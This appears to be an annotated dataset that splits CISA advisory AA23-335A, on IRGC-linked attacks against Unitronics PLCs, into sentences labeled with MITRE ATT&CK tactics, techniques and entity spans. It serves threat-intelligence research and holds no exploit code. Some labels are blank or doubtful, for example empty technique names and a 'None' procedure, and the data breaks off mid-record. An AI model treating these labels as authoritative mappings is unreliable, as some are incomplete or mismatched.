"context_before": "This targeting of PLCs poses an ongoing risk to UK organizations that utilize these components in their Page 2 of 11 | Product ID: AA23-335A TLP:CLEAR", "sentence_text": "For more information on Iranian state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and the FBI’s Iran Threat webpage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p3-s30-f37ff8", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 30, "context_before": "For more information on Iranian state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and the FBI’s Iran Threat webpage.", "sentence_text": "For a downloadable copy of the indicators of compromise (IOCs), see:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p3-s31-35237c", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 31, "context_before": "For a downloadable copy of the indicators of compromise (IOCs), see:", "sentence_text": "AA23-335A (STIX XML, 16KB)\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p3-s32-223cdc", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 32, "context_before": "AA23-335A (STIX XML, 16KB)\n", "sentence_text": "See Table 1 through Table 4 for threat actor activity mapped to MITRE ATT&CK tactics and techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p3-s33-4f8388", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 33, "context_before": "See Table 1 through Table 4 for threat actor activity mapped to MITRE ATT&CK tactics and techniques.", "sentence_text": "For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p3-s34-42a415", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 34, "context_before": "For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.", "sentence_text": "In October 2023, CyberAv3ngers claimed credit on their Telegram Channel for cyberattacks against Israel-based PLCs.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "claim credit for attacks on Telegram", "entities": [ { "text": "CyberAv3ngers", "start": 17, "end": 30, "label": "ThreatActor" }, { "text": "PLCs", "start": 110, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "claimed credit", "start": 31, "end": 45, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p3-s35-2a3712", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 35, "context_before": "In October 2023, CyberAv3ngers claimed credit on their Telegram Channel for cyberattacks against Israel-based PLCs.", "sentence_text": "The PLCs were internet-facing, used Unitronics’ default passwords or no password, and connected to default ports—vulnerabilities that were likely exploited by the actors.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Actors likely exploited internet-facing PLCs that used default passwords or no password.", "entities": [ { "text": "PLCs", "start": 4, "end": 8, "label": "Infrastructure_Indicator" }, { "text": "used Unitronics’ default passwords or no password", "start": 31, "end": 80, "label": "Action" }, { "text": "exploited by the actors", "start": 146, "end": 169, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p3-s36-47e007", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 36, "context_before": "The PLCs were internet-facing, used Unitronics’ default passwords or no password, and connected to default ports—vulnerabilities that were likely exploited by the actors.", "sentence_text": "CyberAv3ngers also reportedly has connections to another IRGC-linked group known as Soldiers of Solomon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p3-s38-959086", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 38, "context_before": "", "sentence_text": "Beginning on Nov. 22, 2023, IRGC cyber actors accessed multiple U.S.-based WWS facilities that operate HMI-capable Unitronics Vision Series PLCs likely by compromising internet accessible devices with default or no passwords.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Access multiple facilities by compromising internet-accessible devices using default or no passwords.", "entities": [ { "text": "IRGC cyber actors", "start": 28, "end": 45, "label": "ThreatActor" }, { "text": "accessed multiple U.S.-based WWS facilities", "start": 46, "end": 89, "label": "Action" }, { "text": "HMI-capable Unitronics Vision Series PLCs", "start": 103, "end": 144, "label": "Infrastructure_Indicator" }, { "text": "compromising internet accessible devices", "start": 155, "end": 195, "label": "Action" }, { "text": "default or no passwords", "start": 201, "end": 224, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-91_mitre_report-p3-s39-3e2972", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 39, "context_before": "Beginning on Nov. 22, 2023, IRGC cyber actors accessed multiple U.S.-based WWS facilities that operate HMI-capable Unitronics Vision Series PLCs likely by compromising internet accessible devices with default or no passwords.", "sentence_text": "Every equipment ‘made in Israel’ is Cyberav3ngers legal target.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p3-s40-ea6dc8", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 40, "context_before": "Every equipment ‘made in Israel’ is Cyberav3ngers legal target.”", "sentence_text": "The actors compromised at least 75 devices, including at least 34 in the WWS Sector in the United States.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T0883", "name": "" } ], "procedure": "compromise at least 75 devices", "entities": [ { "text": "compromised", "start": 11, "end": 22, "label": "Action" }, { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "devices", "start": 35, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "WWS Sector", "start": 73, "end": 83, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-91_mitre_report-p3-s41-3e1cdf", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 41, "context_before": "The actors compromised at least 75 devices, including at least 34 in the WWS Sector in the United States.", "sentence_text": "Page 3 of 11 | Product ID: AA23-335A TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p4-s42-398f02", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 42, "context_before": "Page 3 of 11 | Product ID: AA23-335A TLP:CLEAR", "sentence_text": "The actors compromised multiple Unitronics Vision Series devices by authenticating to internet-connected devices with communications set to the default TCP port 20256", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.001", "name": "Default Accounts" } ], "procedure": "compromised devices by authenticating to internet-connected devices on default TCP port 20256", "entities": [ { "text": "actors", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "Unitronics Vision Series devices", "start": 32, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "TCP port 20256", "start": 152, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "authenticating", "start": 68, "end": 82, "label": "Action" }, { "text": "compromised", "start": 11, "end": 22, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s44-b8efcc", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 44, "context_before": "[T1110].", "sentence_text": "These devices either had a default password in place or no password [T1078.001].", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p4-s45-54ad66", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 45, "context_before": "These devices either had a default password in place or no password [T1078.001].", "sentence_text": "The actors made multiple changes to the devices to disrupt their functions and prevent remote operators from connecting to the devices to remediate the problem.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "made changes to disrupt functions and prevent remote operators from connecting", "entities": [ { "text": "actors", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "disrupt", "start": 51, "end": 58, "label": "Action" }, { "text": "prevent", "start": 79, "end": 86, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s46-7591a1", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 46, "context_before": "The actors made multiple changes to the devices to disrupt their functions and prevent remote operators from connecting to the devices to remediate the problem.", "sentence_text": "Actions taken by the actors included the following:\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p4-s47-79be7a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 47, "context_before": "Actions taken by the actors included the following:\n", "sentence_text": "The actors erased the original ladder logic file on the device and downloaded their own [T1565.001].", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "erase original ladder logic and download malicious file", "entities": [ { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "ladder logic file", "start": 31, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "erased", "start": 11, "end": 17, "label": "Action" }, { "text": "downloaded", "start": 67, "end": 77, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s48-77b0fd", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 48, "context_before": "The actors erased the original ladder logic file on the device and downloaded their own [T1565.001].", "sentence_text": "Their ladder logic file contained no inputs or outputs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p4-s49-019e83", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 49, "context_before": "Their ladder logic file contained no inputs or outputs.", "sentence_text": "Since the programmed ladder logic is responsible for directing the functioning of the device, the replacement ladder logic file prevented the compromised devices from operating as intended.\n", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0826", "name": "" } ], "procedure": "replacement ladder logic file prevented the compromised devices from operating", "entities": [ { "text": "replacement ladder logic file", "start": 98, "end": 127, "label": "MalwareTool" }, { "text": "programmed ladder logic", "start": 10, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "compromised devices", "start": 142, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "prevented", "start": 128, "end": 137, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s50-3db1f2", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 50, "context_before": "Since the programmed ladder logic is responsible for directing the functioning of the device, the replacement ladder logic file prevented the compromised devices from operating as intended.\n", "sentence_text": "The actors renamed the compromised devices, which delayed the device operators from accessing the devices remotely as the device name was a required field for facilitating remote connections [T1531].\n", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1531", "name": "Account Access Removal" } ], "procedure": "renamed the compromised devices to delay operators from accessing them remotely", "entities": [ { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "compromised devices", "start": 23, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "device name", "start": 122, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "renamed", "start": 11, "end": 18, "label": "Action" }, { "text": "delayed", "start": 50, "end": 57, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s51-458a00", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 51, "context_before": "The actors renamed the compromised devices, which delayed the device operators from accessing the devices remotely as the device name was a required field for facilitating remote connections [T1531].\n", "sentence_text": "The actors set the software version of their ladder logic file to an older version [T1565.001].", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "set malicious ladder logic to older version", "entities": [ { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "set", "start": 11, "end": 14, "label": "Action" }, { "text": "ladder logic file", "start": 45, "end": 62, "label": "MalwareTool" } ] }, { "uid": "mitre-91_mitre_report-p4-s52-bca7ab", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 52, "context_before": "The actors set the software version of their ladder logic file to an older version [T1565.001].", "sentence_text": "Resetting the software version prevented the device operators from communicating with the PLC using their engineering workstation.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0819", "name": "" } ], "procedure": "prevent communication by resetting software version", "entities": [ { "text": "PLC", "start": 90, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "prevented", "start": 31, "end": 40, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s53-8f34bf", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 53, "context_before": "Resetting the software version prevented the device operators from communicating with the PLC using their engineering workstation.", "sentence_text": "This could only be resolved if the engineering workstation’s software version changed to match the software version of the new ladder logic file or if the PLC device was factory reset so the ladder logic would be the latest software version.\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p4-s54-b0a795", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 54, "context_before": "This could only be resolved if the engineering workstation’s software version changed to match the software version of the new ladder logic file or if the PLC device was factory reset so the ladder logic would be the latest software version.\n", "sentence_text": "The actors disabled the upload and download functions of the PLC device to prevent the device operators from taking down the splash page [T1499].", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "disable PLC upload/download functions", "entities": [ { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "PLC device", "start": 61, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "disabled", "start": 11, "end": 19, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s55-ae1a0d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 55, "context_before": "The actors disabled the upload and download functions of the PLC device to prevent the device operators from taking down the splash page [T1499].", "sentence_text": "The actors changed the default port number for communicating remotely with the PLC device (from 20256 to 20257)", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Change the default port number used for remote communication with the PLC device.", "entities": [ { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "changed the default port number for communicating remotely with the PLC device", "start": 11, "end": 89, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s57-99f581", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 57, "context_before": "[T1499].\n", "sentence_text": "The actors did not burn their ladder logic file to the device, preventing the retrieval of the ladder logic file from the device.\n", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "prevent retrieval by not burning ladder logic", "entities": [ { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "preventing", "start": 63, "end": 73, "label": "Action" }, { "text": "ladder logic file", "start": 30, "end": 47, "label": "MalwareTool" } ] }, { "uid": "mitre-91_mitre_report-p4-s58-bbb556", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 58, "context_before": "The actors did not burn their ladder logic file to the device, preventing the retrieval of the ladder logic file from the device.\n", "sentence_text": "In at least one instance the actors displayed a text file with the same message on an older device that could not display a graphic image.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0870", "name": "" } ], "procedure": "display message on older device via text file", "entities": [ { "text": "actors", "start": 29, "end": 35, "label": "ThreatActor" }, { "text": "displayed", "start": 36, "end": 45, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s59-b35581", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 59, "context_before": "In at least one instance the actors displayed a text file with the same message on an older device that could not display a graphic image.", "sentence_text": "Multiple versions of the Unitronics devices were compromised, including older models.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "Unitronics devices", "start": 25, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 49, "end": 60, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s60-29d3bc", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 60, "context_before": "Multiple versions of the Unitronics devices were compromised, including older models.", "sentence_text": "The actors developed custom ladder logic files to download for each device type.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "develop custom ladder logic per device type", "entities": [ { "text": "actors", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "ladder logic files", "start": 28, "end": 46, "label": "MalwareTool" }, { "text": "developed", "start": 11, "end": 20, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p4-s61-1a92be", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 61, "context_before": "The actors developed custom ladder logic files to download for each device type.", "sentence_text": "Organizations should consider and evaluate their systems for these possibilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p4-s63-81590e", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 4, "sentence_id": 63, "context_before": "(Update End)", "sentence_text": "Page 4 of 11 | Product ID: AA23-335A TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p5-s64-5d0e86", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 64, "context_before": "Page 4 of 11 | Product ID: AA23-335A TLP:CLEAR", "sentence_text": "For historic reference, see AA23-335A IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities (Original Version).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p5-s65-e04c55", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 65, "context_before": "For historic reference, see AA23-335A IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities (Original Version).", "sentence_text": "(Update End)\nMITRE ATT&CK Tactics and Techniques See Table 1 through Table 4 for all referenced threat actor tactics and techniques in this advisory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p5-s66-09a597", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 66, "context_before": "(Update End)\nMITRE ATT&CK Tactics and Techniques See Table 1 through Table 4 for all referenced threat actor tactics and techniques in this advisory.", "sentence_text": "For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p5-s67-c0156d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 67, "context_before": "For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.", "sentence_text": "Technique Title ID Use Brute Force T1110", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p5-s68-2a2efe", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 68, "context_before": "Technique Title ID Use Brute Force T1110", "sentence_text": "The actors used brute force to gain access to Valid Accounts.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110", "name": "Brute Force" } ], "procedure": "use brute force to access valid accounts", "entities": [ { "text": "actors", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "used brute force", "start": 11, "end": 27, "label": "Action" }, { "text": "Valid Accounts", "start": 46, "end": 60, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-91_mitre_report-p5-s69-e66f00", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 69, "context_before": "The actors used brute force to gain access to Valid Accounts.", "sentence_text": "Technique Title ID Use Valid Accounts:\nT1078.001", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p5-s70-afd881", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 70, "context_before": "Technique Title ID Use Valid Accounts:\nT1078.001", "sentence_text": "The actors compromised multiple devices via default credentials.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.001", "name": "Default Accounts" } ], "procedure": "compromise devices via default credentials", "entities": [ { "text": "actors", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "compromised", "start": 11, "end": 22, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p5-s71-ec371e", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 71, "context_before": "The actors compromised multiple devices via default credentials.", "sentence_text": "Default Accounts\nTechnique Title ID Use The actors erased the original ladder logic file on compromised devices.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "erase original ladder logic file", "entities": [ { "text": "The actors", "start": 40, "end": 50, "label": "ThreatActor" }, { "text": "original ladder logic file", "start": 62, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "compromised devices", "start": 92, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "erased", "start": 51, "end": 57, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p5-s72-29600c", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 72, "context_before": "Default Accounts\nTechnique Title ID Use The actors erased the original ladder logic file on compromised devices.", "sentence_text": "The actors set the software version of their ladder logic file to an older version, which prevented device operators from communicating with the Stored Data T1565.001 PLC using their engineering workstation.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "Actors downgraded ladder logic file version to disrupt communication between operators and PLC devices.", "entities": [ { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "set the software version of their ladder logic file to an older version", "start": 11, "end": 82, "label": "Action" }, { "text": "prevented device operators from communicating with the Stored Data T1565.001 PLC", "start": 90, "end": 170, "label": "Action" }, { "text": "PLC", "start": 167, "end": 170, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-91_mitre_report-p5-s73-52596e", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 73, "context_before": "The actors set the software version of their ladder logic file to an older version, which prevented device operators from communicating with the Stored Data T1565.001 PLC using their engineering workstation.", "sentence_text": "This could only be resolved Manipulation when the engineering workstation’s software version changed to match the software version of the new ladder logic file or if the PLC device was factory reset so the ladder logic would be the latest software version.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p5-s74-75d798", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 74, "context_before": "This could only be resolved Manipulation when the engineering workstation’s software version changed to match the software version of the new ladder logic file or if the PLC device was factory reset so the ladder logic would be the latest software version.", "sentence_text": "The actors renamed the compromised devices so that device operators Account Access could no longer access them.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1531", "name": "Account Access Removal" } ], "procedure": "rename devices to prevent operator access", "entities": [ { "text": "actors", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "renamed", "start": 11, "end": 18, "label": "Action" }, { "text": "compromised devices", "start": 23, "end": 42, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-91_mitre_report-p5-s75-8c8a09", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 75, "context_before": "The actors renamed the compromised devices so that device operators Account Access could no longer access them.", "sentence_text": "T1531\nRemoval", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p5-s76-b975e0", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 76, "context_before": "T1531\nRemoval", "sentence_text": "The actors enabled password protections for the upload functions to prevent device operators from changing the programming remotely.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1531", "name": "Account Access Removal" } ], "procedure": "enabled password protections for the upload functions to prevent remote programming changes", "entities": [ { "text": "actors", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "enabled password protections", "start": 11, "end": 39, "label": "Action" }, { "text": "prevent device operators from changing the programming remotely", "start": 68, "end": 131, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p5-s77-cddb15", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 5, "sentence_id": 77, "context_before": "The actors enabled password protections for the upload functions to prevent device operators from changing the programming remotely.", "sentence_text": "Page 5 of 11 | Product ID: AA23-335A TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p6-s79-5c4148", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 79, "context_before": "Defacement:", "sentence_text": "The actors uploaded a splash page to the HMI screen to display a Internal T1491.001 message regarding the hacking.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491.001", "name": "Internal Defacement" } ], "procedure": "upload defacement splash page to HMI", "entities": [ { "text": "actors", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "HMI screen", "start": 41, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "uploaded", "start": 11, "end": 19, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p6-s80-993f64", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 80, "context_before": "The actors uploaded a splash page to the HMI screen to display a Internal T1491.001 message regarding the hacking.", "sentence_text": "Defacement\nTechnique Title ID Use Endpoint Denial of The actors changed the default port number for communicating remotely T1499 Service with the PLC device.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "changed the default port number for communicating remotely with the PLC device", "entities": [ { "text": "PLC device", "start": 146, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "changed the default port number", "start": 64, "end": 95, "label": "Action" }, { "text": "The actors", "start": 53, "end": 63, "label": "ThreatActor" } ] }, { "uid": "mitre-91_mitre_report-p6-s81-a82504", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 81, "context_before": "Defacement\nTechnique Title ID Use Endpoint Denial of The actors changed the default port number for communicating remotely T1499 Service with the PLC device.", "sentence_text": "These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p6-s82-8c7479", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 82, "context_before": "These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST).", "sentence_text": "The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p6-s83-333c6c", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 83, "context_before": "The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement.", "sentence_text": "CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p6-s84-531352", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 84, "context_before": "CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures.", "sentence_text": "Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p6-s85-b2244b", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 85, "context_before": "Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.", "sentence_text": "Note: The mitigations below are based on threat actor activity against Unitronics PLCs, but threat actors have targeted multiple internet-exposed PLCs in 2024.1 These mitigations should be applied to any internet-facing PLCs.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T0883", "name": "" } ], "procedure": "targeted 